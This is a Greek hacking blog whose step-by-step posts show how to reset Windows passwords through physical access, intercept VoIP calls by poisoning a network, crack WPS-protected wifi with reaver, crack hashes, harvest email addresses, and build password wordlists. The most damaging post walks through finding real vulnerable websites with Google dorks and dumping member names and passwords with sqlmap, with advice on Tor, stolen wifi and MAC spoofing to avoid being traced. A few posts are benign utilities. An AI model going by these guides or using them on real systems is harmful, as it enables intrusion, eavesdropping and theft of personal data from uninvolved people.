Ευχαριστω ολους οσους με παρακολουθουνε και εχουνε βρει χρησιμους τους οδηγους μου.
Ητανε δυσκολο να διατηρησω το Blog λογο επαγγελματος αλλα με την βοηθεια σας εγινε γνωστο
Η γνωση ειναι δυναμη!!!! ενα μεγαλο δωρο για τους αναγνωστες μου πατηστε εδω
ο κωδικος ειναι ΝικοςοΝαυτης
ΠΡΟΣΟΧΗ
Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι
Δευτέρα 31 Δεκεμβρίου 2012
Το Blog NicktheSail0r εκλεισε 1 χρονο
Ετικέτες
Aνακοινωσεις
Κυριακή 30 Δεκεμβρίου 2012
Πως ξεκλειδωνετε τον κωδικο προσβασης στα Windows
Τι θα χρειαστειτε;
1.Backtrack 5 r3 σε LiveUsb
2.chntpw
3.Φυσικη προσβαση στον υπολογιστη
- Βαζουμε το στικακι στον υπολογιστη που θελουμε να ξεκλειδωσουμε και τρεχουμε τα Backtrack *πρεπει να ειναι στο boot option στο Bios boot from usb για να μας τρεξει το στικακι* θα μας τρεξει το στικακι επιλεγουμε default και μετα μας βγαζει στην γραμμη εντολων γραφουμε root για username και toor για κωδικο προσβασης μετα γραφουμε startx για να μας παει στο γραφικο περιβαλλον
- Παταμε Ctrl+Alt+T και μας ανοιγει ενα τερματικο
- Γραφουμε fdisk -l
- Βλεπουμε οτι τα windows ειναι HPFS/NTFS με id 7
- Το αλλο partition με id 7 ειναι το recovery των windows οποτε διαλεγουμε το μεγαλυτερο σε blocks δλδ το sda3
- Οποτε γραφουμε στο ιδιο τερματικο mkdir /mnt/window7 ετσι ωστε να δημιουργησουμε σημειο φορτωσεις του δισκου
- μετα γραφουμε mount /dev/sda3 /mnt/window7 και φορτωνουμε το σημειο
- μετα γραφουμε cd /mnt/window7/
- και μετα cd Windows/System32/config
- και μετα ls και ψαχνουμε να βρουμε το αρχειο SAM
- οποτε η διαδρομη του αρχειου SAM ειναι /mnt/window7/Windows/System32/config/sam
- οποτε μετα
- Παταμε Ctrl+Alt+T και ανοιγουμε ενα τερματικο
- Στο τερματικο γραφουμε cd /pentest/passwords/chntpw
- και μετα ./chntpw -i /mnt/window7/Windows/System32/config/sam
- οπου -i την διαδρομη που βρηκαμε το αρχειο SAM
- παταμε 1 και enter βλεπουμε τους χρηστες
- ο χρηστης με ?????? ειναι γραμμενος με ελληνικους χαρακτηρες
- μετα γραφουμε το user name που θελουμε να ξεκλειδωσουμε
- πχ Αdministrator
- και μετα επιλεγουμε 1 και παταμε enter και θα σβησει τον κωδικο στο user Administrator
- *με την επιλογη 2 μπορειτε να αλλαξετε και να βαλετε δικο σας κωδικο η με την 3 να κανετε εναν χρηστη ως διαχειριστη δλδ με administrator δικαιωματα με 4 να ξεκλειδωσετε η να ενεργοποιησετε λογαριασμο χρηστη
- τωρα παταμε Ctrl+c και γραφουμε reboot οταν μας ζητησει να βγαλουμε το στικακι το βγαζουμε και παταμε enter κανει restart και μπαινουμε στα windows χωρις κωδικο :)
Ετικέτες
Tips and Tricks
Πέμπτη 27 Δεκεμβρίου 2012
Πως υποκλεβετε συνομιλιες μεσω Voip
Τι θα χρειαστειτε;
1.Backtrack 5 r3
2.Wireshark
3.Ενα δικτυο που να χρησιμοποιει Voip
- Ανοιγουμε ενα τερματικο και γραφουμε wireshark και μας εμφανιζει σε γραφικη μορφη το wireshark
- επιλεγουμε eth0 και παταμε start
- τωρα δηλητηριαζουμε με το ettercap δειτε παλιοτερους οδηγους πως αν δεν ξερετε
- πηγαινουμε πανω και παταμε telephony και Voip calls
- επιλεγουμε την συνομιλια και παταμε decode
- μετα παταμε play και ακουμε την συνομιλια
πατηστε εδω
*Οταν κατεβασετε την συνομιλια απλα ανοιξτε το wireshark επιλεξτε open και επιλεξτε το αρχειο που κατεβασατε και ακολουθηστε την ιδια διαδικασια αλλα χωρις να δηλητηριασετε το δικτυο με το ettercap
Ετικέτες
Sniffing
Δευτέρα 24 Δεκεμβρίου 2012
Πως θα φτιαξετε ενα Usb στικακι κατα των ιων
Τι θα χρειαστειτε?
1.Dr web live usb πατηστε εδω
2.Windows
3.Ενα στικακι Usb
- καθως εχετε κατεβασει το Dr web βαζετε το στικακι ανοιγετε το αρχειο και επιλεγετε Generate Dr web LiveUsb
- οταν τελειωσει καντε επανεκινηση του υπολογιστη σας και σας κανει boot απο το στικακι επιλεγετε English και πατατε enter
- Οταν σας εμφανισει το γραφικο περιβαλλον του Dr web τοτε μπορειτε να το βαλετε να κανει ανιχνευση ολου του σκληρου σας δισκου για ιους και να επιδιορθωσει την ζημια
*Το Dr Web live Usb μπορειτε να το χρησιμοποιησετε και οταν δεν μπορειτε να μπειτε στα windows λογω ζημιας απο ιο.θα ανιχνευσει θα διαγραψει και θα σας βοηθησει να μεταφερετε τα αρχεια σας σε ενα εξωτερικο σκληρο αν η ζημια ειναι πολυ μεγαλη ετσι ωστε να μην τα χασετε.
Ετικέτες
Live Usb
Παρασκευή 21 Δεκεμβρίου 2012
Πως θα μαθετε αν εχετε ιους στα Βacktrack σας
Τι θα χρειαστειτε;
1.Backtrack 5 r3
Οι περισσοτεροι χρηστες των Backtrack μαθαινουνε να κανουνε hacking μεσω οδηγων χωρις να ξερουνε πως και γιατι με συνεπεια να να πεσουνε σε ενα πραγματικο hacker και να τους ανακτησει το συστημα τους χωρις να το καταλαβουνε καθως τα Backtrack δεν εχουνε την ιδια ασφαλεια οπως τα windows και το σημαντικοτερο δεν εχουνε antivirus καθως ειναι κυριως λειτουργικο για επιθεση και ευρεση κενων ασφαλειας σε λειτουργικα και ιστοσελιδες.
- Πηγαινουμε Applications-Backtrack-Forensics-Anti-Virus Forensics Tools και επιλεγουμε chkrootkit
- μας ανοιγει το τερματικο και γραφουμε ./chkrootkit και παταμε enter
- και ετσι βλεπετε αν εχετε rootkit
Ετικέτες
Tips and Tricks
Πως θα ανακτησετε διεγραμμενα αρχεια απο το USB στικακι σας
Τι θα χρειαστειτε;
1.Backtrack 5 r3
2.Ενα στικακι Usb
- Βαζουμε το στικακι
- ανοιγουμε ενα τερματικο και γραφουμε fdisk -l για να δουμε σε ποια διαδρομη ειναι το στικακι μας
- μετα γραφουμε fatback -a /dev/sdb1 -o /root/arxeia/
- οπου -a /dev/sdb1 ειναι η διαδρομη που βρισκεται το στικακι μας και με την επιλογη -a θα τα ανακτησει αυτοματα
- -ο /root/arxeia/ ειναι ο φακελος που θα αποθηκευσει τα διεγραμμενα αρχεια
- * στα windows μπορειται να βρειτε αλλα προγραμματα οπως Disk Recovery κτλ μερικα ομως θα πρεπει να τα αγορασετε
Ετικέτες
Recovery
Σάββατο 1 Δεκεμβρίου 2012
Τωρα το Blog Nickthesail0r και σε Android
Ετικέτες
Aνακοινωσεις
Τρίτη 26 Ιουνίου 2012
Πως αναβαθμιζω απο Backtrack 5 R1,R2 σε Backtrack 5 R3
Τι θα χρειαστεις;
1.Backtrack 5 R1,R2
2.Συνδεση internet
1. Ανοιγουμε ενα τερματικο και γραφουμε
2.Συνδεση internet
1. Ανοιγουμε ενα τερματικο και γραφουμε
apt-get update && apt-get dist-upgrade
2. Οταν τελειωσει γραφουμε και αυτο
apt-get install libcrafter blueranger
dbd
inundator intersect mercury
cutycapt trixd00r artemisa rifiuti2
netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney
apache-users
phrasendrescher kautilya manglefizz rainbowcrack
rainbowcrack-mt lynis-audit
spooftooph wifihoney twofi truecrack
uberharvest acccheck statsprocessor
iphoneanalyzer jad javasnoop
mitmproxy ewizard multimac netsniff-ng smbexec
websploit dnmap johnny
unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn
binwalk
laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy
creddump android-sdk apktool ded dex2jar droidbox smali termineter
bbqsql htexploit
smartphone-pentest-framework fern-wifi-cracker
powersploit webhandler
(απλα καντε το αντιγραφη επικολληση απο εδω)
Ετικέτες
Tips and Tricks
Τετάρτη 25 Ιανουαρίου 2012
DVWA - Damn Vulnerable Web App
DVWA ειναι μια εφαρμογη που σας επιτρεπει να εξασκηθειτε σε SQL injection ,XSS και διαφορα σε νομιμο περιβαλλον καθως θα κανετε επιθεση στην δικια σας σελιδα μπορειτε να δοκιμασετε το sqlmap,sqlninja,hydra,και πολλα αλλα προγραμματα εισβολης σε μια ιστοσελιδα.
Τι θα χρειαστειτε;
1.Backtrack 5R1
2.DVWA download
3.Aυτοματο scritp download
- οταν εχετε κατεβασει το DVWA τοτε καντε το extract στον φακελο root
- μετα οταν εχετε κατεβασει το Auto.script καντε το να ειναι εκτελεσιμο με δεξι κλικ properties, επιλεξτε να ειναι executable και ανοιξτε το, run in terminal.
- μετα πηγαινετε Applications -Backtrack-Services-MySQLD-mysql start
- τελος πητηστε εδω http://127.0.0.1/login.php βαλτε username 'admin' και password 'password'
- μετα πατηστε setup και create database και εχετε φτιαξει τα δεδομενα σας
- τωρα ειστε ετοιμοι να κανετε τις εισβολες σας σε νομιμο περιβαλλον
Ετικέτες
Attack and Exploit,
File Crack,
Router hack,
Tips and Tricks,
Web attack
Πέμπτη 19 Ιανουαρίου 2012
Πως βρισκω και σπαω ενα δικτυο WPA/WPA2 με WPS
Τι θα χρειαστεις;
1.Backtrack 5 R1
2.Reaver
3.WPA/WPA2 δικτυο με Wifi Protected Setup
- Παταμε εδω και κατεβαζουμε το Reaver
- μετα αφου το αρχειο reaver-1-3.tar.gz εχει κατεβει και ειναι στον φακελο root ανοιγουμε ενα τερματικο και γραφουμε
- tar zxvf reaver-1-3.tar.gz
- μετα cd reaver-1-3
- cd src
- ./configure
- make
- make install
- και ειμαστε ετοιμοι να αρχισουμε (αποσυνδεουμε το δικτυο μας)
- airmon-ng start wlan0
- walsh -i mon0 -C
- βλεπουμε ποιο δικτυο εχει WPS σημειωνουμε την mac address , παταμε ctrl+c και παμε με το reaver για να το σπασουμε
- γραφουμε reaver -i mon0 -b 00:24:40:48:99:99 -vv
- οπου
- -b την mac address του δικτυου που θελουμε να σπασουμε
- -vv βαζουμε για να μας δειχνει λεπτομερως τι γινετε
- αν γραψετε μονο reaver θας σας εμφανισει ολες τις επιλογες που μπορειτε να εφαρμοσετε
- περιμενουμε και μας εμφανιζει τον κωδικο
- αν θελετε μπορειτε να πατησετε ctrl+c και να συνεχισετε οποτε εσεις θελετε γιατι σε μερικα ρουτερ κραταει ωρες πχ οταν δοκιμαζει το reaver τους κωδικους, το ρουτερ μετα απο καποιες προσπαθειες κλειδωνει και μετα απο 5 λεπτα δεχετε αλλες προσπαθειες για κωδικους
- Επιπλεον επιλογες του reaver που θα σας φανουν χρησιμες
- -a βρισκει αυτοματα τις καλυτερες ρυθμισεις σπασιματος για το δικτυο
- - l βαλτε ποσος χρονος θα ειναι η αναμονη για να ξαναπροσπαθησει το σπασιμο πχ. -l 630 * οταν σας λεει Warning AP detected limited time retrying .....εφαρμοζετε αυτη την επιλογη συνηθως πανω απο 315 δευτερα βαζετε.
- -r βαζετε τον χρονο αναμονης στις ποσες προσπαθειες δλδ -r 315:4 θα κανει 4 προσπαθειες και μετα θα περιμενει πεντε λεπτα και 15 δευτερα μεχρι να ξαναρχισει
- -t βαζετε τον χρονο αναμονης ληψης αναμεσα απο καθε προσπαθεια σπασιματος ( pin attemps) δλδ κανετε μια προσπαθεια και περιμενετε αποτελεσμα αυτο τον χρονο ρυθμιζετε οταν σας λεει waarning receive timeout occur συνηθως το αλλαζετε σε μεγαλυτερο
- -L αγνοειτε το κλειδωμα του ρουτερ και τον χρονο αναμονης που πρεπει να περιμενετε.
- -S στελνετε μικροτερα πακετα και επιταχυνει το χρονο του σπασιματος
- τις επιλογες πρεπει να τις βαλετε μετα το -vv δλδ
- reaver -i mon0 -b <mac_address> -vv -a -l 630 -r 630:4 -t 5 -L -S κτλ.....
- Με αυτη την επιθεση του reaver δεν χρειαζετε να ειναι συνδεδεμενος κανενας χρηστης ουτε χρειαζονται λεξικα για να σπασει το δικτυο επισεις μπορειτε να συνεχισετε οποτε θελετε απο εκει που ειχατε μεινει.
Πως να προστατευτειτε;
1.Απενεργοποιηστε το WPS στο ρουτερ σας
Ετικέτες
WEP/WPA/WPA2 Crack
Τετάρτη 18 Ιανουαρίου 2012
Πως σπαμε Μd5/Sha1 κωδικοποιησεις με john the Ripper
Τι θα χρειαστειτε?
1.Backtrack 5 R1
- Πρωτα αναγνωριζουμε τον κωδικο τι κωδικοποιηση εχει αν md5 η sha1
- md5 εχουνε 32 ψηφια fd144f65f19df1c7adaa116c44ce2617
- sha1 εχουνε 40 ψηφια 54274c1b66e4db9103a52754b9f88c07567bd846
- και στα 2 ειναι κωδικοποιημενο το ονομα Nick
- Ανοιγουμε ενα τερματικο και γραφουμε
- cd /pentest/passwords/john
- μετα john --format=raw-md5 /root/md5.txt
- οπου
- --format= βαζουμε την κωδικοποιηση
- και /root/md5.txt το αρχειο που εχουμε αποθηκευσει τους κωδικους μεσα
- οταν μας εμφανισει
- No password hashes left to crack
- γραφουμε john --format=raw-md5 --show /root/md5.txt
- και μας εμφανιζει τους κωδικους
Κωδικοποιησεις που σπαει το john the ripper
- des/bsdi/md5/bf/afs/lm/bfegg/dmd5/dominosec/epi/hdaa/ipb2/krb4/krb5/mschapv2/mysql-fast/mysql/netlm/netlmv2/netntlm/netntlmv2/nethalflm/ssha/nsldap/md5ns/nt/openssha/phps/po/xsha/crc32/hmac-md5/lotus5/md4-gen/mediawiki/mscash/mscash2/mskrb5/mssql/mssql05/mysql-sha1/oracle11/oracle/phpass-md5/pix-md5/pkzip/raw-md4/raw-md5/raw-sha1/raw-md5u/salted-sha1/sapb/sapg/sha1-gen/trip/raw-sha224/raw-sha256/raw-sha384/raw-sha512/xsha512/hmailserver/sybasease/crypt/ssh/pdf/rar/zip/dummy/dynamic_n
Ετικέτες
File Crack,
Router hack,
Web attack,
WEP/WPA/WPA2 Crack
Πως θα σερφαρετε ανωνυμα;
Τι θα χρειαστειτε?
1.Backtrack 5 R1
2.Tor
- Ανοιγουμε ενα τερματικο και γραφουμε
- lsb_release -c
- και μας εμφανιζει τι διανομη linux εχουμε
- πχ lucid
- πηγαινουμε και ανοιγουμε με gedit το αρχειο /etc/apt/sources.list
- και προσθετουμε κατω αυτη την γραμμη
deb http://deb.torproject.org/torproject.org <DISTRIBUTION> main
*οπου <destribution> μας την εμφανιζει η πρωτη εντολη που γραψαμε
- deb http://deb/torproject.org/torproject.org lucid main
- το αποθηκευουμε και το κλεινουμε
- γραφουμε στο τερματικο
gpg --keyserver keys.gnupg.net --recv 886DDD89
- μας εμφανιζει αυτο
- gpg: Total number processed: 1
gpg: unchanged: 1
- μετα γραφουμε
- gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
- μας εμφανιζει ΟΚ
- μετα apt-get update
- apt-get install tor tor-geoipdb
- εχουμε εγκαταστησει το tor χωρις προβληματα παταμε εδω επιτρεπουμε να κανουμε εγκατασταση το torbutton κανουμε ενα restart του firefox και θα δουμε ενα κρεμμυδι αριστερα πανω παταμε πανω του και επιλεγουμε Toggle Tor status οταν γινει πρασινο παταμε εδω για να κοιταξουμε αν εχουμε ρυθμισει σωστα το Tor
- επισεις μπορειτε να το ελενξετε και εδω αν λεει αλλη ip χωρας ειστε ενταξει αν λεει ip της Ελλαδας τοτε δεν ειστε ενταξει.
Προσοχη
ο καλυτερος τροπος για να μην εντοπιστεις ειναι να χρησιμοποιεις ξενο ασυρματο δικτυο να εχεις αλλαξει την Mac addresss σου και επισεις οταν κανεις την επιθεση να μην μπεις σε καμια σελιδα με τα προσωπικα σου δεδομενα οπως Facebook,hotmail,Gmail κτλ αλλα και παλι αν ειναι να σε εντοπισουνε θα σε εντοπισουνε εφοσον εχεις διαπραξει σοβαρο αδικημα και για να το καταλαβετε σωστα πχ εγω κανω μια επιθεση σε μια σελιδα
Εγω---->tor1---->tor2----->tor3------>tor4--->σελιδα
σελιδα--->tor4--->tor3--->tor2--->tor1--->σε εμενα
δλδ η σελιδα ξερει μονο τον tor4,o tor4 τον tor3 κτλ
οποτε για να με εντοπισουνε πρεπει να βρουνε τα ιχνη του tor4 να πανε στον tor3 μετα tor2 κτλ μεχρι να φτασουνε σε εμενα και μιλαμε για μεγαλη βαση δεδομενων και αν φτασουνε σε εμενα θα φτασουνε στην isp υπηρεσια πχ forhtnet η οποια θα τους πει που ειναι το ρουτερ μου εφοσον εχω διαπραξει καποιο αδικημα αλλα εφοσον δεν ειναι δικο μου το δικτυο και κλεβω ασυρματα θα ερθουνε στην οικια του ρουτερ δλδ καπου κοντα στην γειτονια μου και θα με εντοπισουνε με την mac address μου αλλα εγω την εχω αλλαξει οποτε δεν μπορουνε να κανουνε ταυτοποιηση οτι οντως εγω εκανα την επιθεση βεβαια κανεις δεν ειναι 100% ανωνυμος στο διαδικτυο
Ετικέτες
Tips and Tricks
Δευτέρα 16 Ιανουαρίου 2012
Πως να κλεβετε στοιχεια απο ιστοσελιδες (SQLmap)
Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.
Τι θα χρειαστειτε;
1.Backtrack 5 R1
- παμε στο google και κανουμε αναζητηση .php?id= gr
- θα μας εμφανισει ελληνικες και ξενες σελιδες που μπορει να ειναι ευαλωτες σε sql injection
- επιλεγουμε και ανοιγουμε την σελιδα και στην url βαζουμε ' στο τελος
- αν μας βγαλει MYSQL warning η Mysql syntax error τοτε ειναι 100% ευαλωτη
- *η κατεβαζετε το text αρχειο με Google Dorks download
- το ανοιγετε κανετε αντιγραφη μια σειρας και επικοληση στην αναζητηση του Google
- *η κατεβαζετε το XcodeExploitScanner download
- οταν το εχουμε κατεβασει κανουμε extract και μετα παμε στο XcodeExploitScanner.exe δεξι κλικ και εκτελεση ως διαχειριστης
- εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες
- μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες
- πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack
- *περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google
- Ανοιγουμε ενα τερματικο και γραφουμε
- cd /pentest/database/sqlmap
- οποτε παμε στο τερματικο μας και γραφουμε
- ./sqlmap.py -u [url] --beep
- πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --beep
- οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα
- μετα γραφουμε
- ./sqlmap.py -u [url] --dbs
- πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dbs
- θα μας εμφανισει τα Database πχ
- available databases [6]:
[*] dswa
[*] dswa_stage
[*] dswawordpress
[*] information_schema
[*] mysql
[*] test
- ./sqlmap.py -u [url] --tables -D [database]
- μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι
- πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --tables -D dswa
- Database: dswa
[104 tables]
+-----------------------------------+
| access
| accesslog
| actions
| actions_aid
| advanced_help_index
| authmap
| autologout
| batch
| blocks
| blocks_roles
| boxes
| cache
| cache_block
| cache_content
| cache_filter
| cache_form
| cache_menu
| cache_page
| cache_update
| cache_views
| cache_views_data
| comments
| content_access
| content_field_headername
| content_group
| content_group_fields
| content_node_field
| content_node_field_instance
| content_type_education_center_sub
| content_type_find_alliance
| content_type_member_home_page
| content_type_member_page
| content_type_page
| content_type_page_ns
| content_type_story
| dswa_chapters_main
| dswa_chapters_persons
| dswa_eventuity_additional
| dswa_eventuity_link
| dswa_eventuity_main
| dswa_profile_additional
| dswa_profile_geographic
| dswa_profile_images
| dswa_profile_main
| dswa_store_categories
| dswa_store_featured
| dswa_store_featured_sample
| dswa_store_images
| dswa_store_product_categories
| dswa_store_products
| dswa_taq_articles
| dswa_taq_quotes
| dswa_taq_tips
| dswa_taq_topics
| dswa_teleclasses_additional
| dswa_teleclasses_main
| dswa_teleclasses_speakers
| dswa_whatsnew_main
| dswa_whatsnew_order
| fckeditor_role
| fckeditor_settings
| files
| filter_formats
| filters
| flood
| history
| menu_custom
| menu_links
| menu_router
| node
| node_access
| node_comment_statistics
| node_counter
| node_revisions
| node_type
| performance_detail
| performance_summary
| permission
| profile_fields
| profile_values
| role
| search_dataset
| search_index
| search_node_links
| search_total
| semaphore
| sessions
| system
| term_data
| term_hierarchy
| term_node
| term_relation
| term_synonym
| upload
| url_alias
| users
| users_roles
| variable
| views_display
| views_object_cache
| views_view
| vocabulary
| vocabulary_node_types
| watchdog
+-----------------------------------+ - ./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
- πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --columns -T user -D dswa
- Database: dswa
Table: users
[19 columns]+------------------+------------------+
| Column | Type |
+------------------+------------------+
| access | int(11) |
| created | int(11) |
| data | longtext |
| init | varchar(64) |
| language | varchar(12)|
| login | int(11) |
| mail | varchar(64)|
| mode | tinyint(4) |
| name | varchar(60)|
| pass | varchar(32) |
| picture | varchar(255) |
| signature | varchar(255)|
| signature_format | smallint(6) |
| sort | tinyint(4) |
| status | tinyint(4) |
| theme | varchar(255)|
| threshold | tinyint(4) |
| timezone | varchar(8) |
| uid | int(10) unsigned |
+------------------+------------------+ - ./sqlmap.py -u [url] --dump -C [column] -T [table name] -D [databasename]
- πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump -C pass -T users -D dswa
- πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα
- ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump -C name -T users -D dswa
- και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα
- και ετσι κλεβετε διαφορες πληροφοριες απο μια σελιδα
- *κακοβουλοι χρηστες κανουνε αυτη την επιθεση με την χρηση του Tor ετσι ωστε να μην εντοπιστουνε.
- σχετικο αρθρο που μπορει να σας βοηθησει εδω
- η επιλογη --tor στο sqlmap χρησιμοποιει proxy και δεν μπορουν να σας εντοπισουν την ip
Πως θα προστετευτειτε;
1.Μην κανετε εγγραφη σε ευαλωτες σελιδες γιατι με αυτο τον τροπο θα κλεψουνε ονοματα/κωδικους και διαφορα προσωπικα στοιχεια σας τα οποια μπορουνε να χρησιμοποιησουνε για να εισβαλουνε στο συστημα σας η στην προσωπικη αλληλογραφια σας
2.Ποτε μην βαζετε προσωπικα δεδομενα σε σελιδες
Ετικέτες
Web attack
Σάββατο 14 Ιανουαρίου 2012
Πως να μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας
Με αυτο τον οδηγο θα σας δειξω πως θα μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας απο yahoo,hotmail,gmail κτλ
Τι θα χρειαστειτε;
1.Backtrack 5 R1
- Ανοιγω ενα τερματικο και γραφουμε msfconsole
- back
- use gather/search_email_collector
- set DOMAIN hotmail.gr
- set outfile /root/email.txt
- run
- και θα μας τα εμφανισει και θα τα αποθηκευσει στον φακελο /root σε αρχειο email.txt
- με αυτο τον τροπο οι spammers και οι διαφημιστες συγκεντρωνουν emails και στελνουνε διαφορα
Πως θα προστατευτειτε;
1.Στο προφιλ σας βγαλτε να ειναι δημοσιο το email σας
2.Και ποτε μην βαζετε το email σας δημοσια σε forum,κοινωνικα δικτυα κτλ
Ετικέτες
Tips and Tricks
Πως να επιταχυνετε το μTorrent
1.Συνδεση στο ιντερνετ
2.μTorrent
- Ανοιγουμε το μTorrent και παταμε ctrl+p και μας ανοιγει τις επιλογες
- πηγαινουμε συνδεση και εφαρμοζουμε τις ρυθμισεις οπως στην εικονα
- μετα παμε Ευρος ζωνης και εφραμοζουμε τις ρυθμισεις οπως στην κατω εικονα
- μετα BitTorrent οπως στην εικονα
- μετα προτεραιοτητα οπως στην εικονα κατω
- και προχωρημενες παμε στο net.max_halfopen και βαζουμε 90 τιμη
- Τελος .Ειμαστε ετοιμοι να κατεβαζουμε με την μεγιστη ταχυτητα που μπορουμε *οταν κατεβαζετε να κοιτατε τους seeders να ειναι περισσοτεροι απο τους leechers δλδ με απλα λογια να κοιτατε αυτους που το ανεβαζουνε να ειναι περισσοτεροι απο αυτους που το κατεβαζουνε
Ετικέτες
Tips and Tricks
Τρίτη 10 Ιανουαρίου 2012
Πως θα φτιαξετε δικιες σας λιστες κωδικων για σπασιμο δικτυων
Με αυτο τον οδηγο θα μαθετε να φτιαχνετε λιστες κωδικων
Τι θα χρειαστειτε;
1.Backtrack 5 R1
- ανοιγουμε ενα τερματικο και γραφουμε
- cd /pentest/passwords/crunch
- μετα ./cruch 4 4 1234567890 -o /root/lexiko.txt
- με αυτην την εντολη θα δημιουργησετε απο το 0000-9999
- οπου
- ''1234567890'' τι θα χρησιμοποιησει για να φτιαξει κωδικους
- 4 4 το μηκος των κωδικων δλδ 4ψηφια
- -ο /root/lexiko.txt οτι θα τα αποθηκευσει στον φακελο root σε lexiko.txt ετσι ωστε να το βρειτε ποιο ευκολα
- ./crunch 4 4 -f charset.lst lalpha -o /root/lexiko.txt
- με αυτη την εντολη θα δημιουργησετε απο το aaaa-zzzzz
- οπου
- 4 4 4ψηφια δλδ το μηκος των κωδικων
- -f charset.lst οι χαρακτηρες μπορειτε να επιλεξετε πχ απο εδω
- hex-lower=[0123456789abcdef]
hex-upper=[0123456789ABCDEF]
numeric=[0123456789]
numeric-space=[0123456789 ]
symbols14=[!@#$%^&*()-_+=]
symbols14-space=[!@#$%^&*()-_+= ]
symbols-all=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
symbols-all-space=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
ualpha=[ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-symbol14= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
lalpha=[abcdefghijklmnopqrstuvwxyz]
lalpha-space=[abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric=[abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space=[abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
lalpha-numeric-symbol14-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
lalpha-numeric-all=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
lalpha-numeric-all-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
mixalpha=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
mixalpha-numeric=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
mixalpha-numeric-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
mixalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
mixalpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] - πχ αν θελω να φτιαξω μια λιστα με ονομα και κωδικο οπως Nikos99 δλδ το ονομα και ημερομηνια γεννησης
- ./crunch 7 7 -f charset.lst numeric -t Nikos%% -o /root/nikos.txt
- και θα δημιουργησει μια λιστα απο Nikos00-Nikos99
- οπου 7 7 το μηκους των κωδικων εφοσον το Nikos ειναι ηδη 5 και 2 τα τελευταια ψηφια θα ειναι 7
- -f τι χαρακτηρες θα χρησιμοποιησει
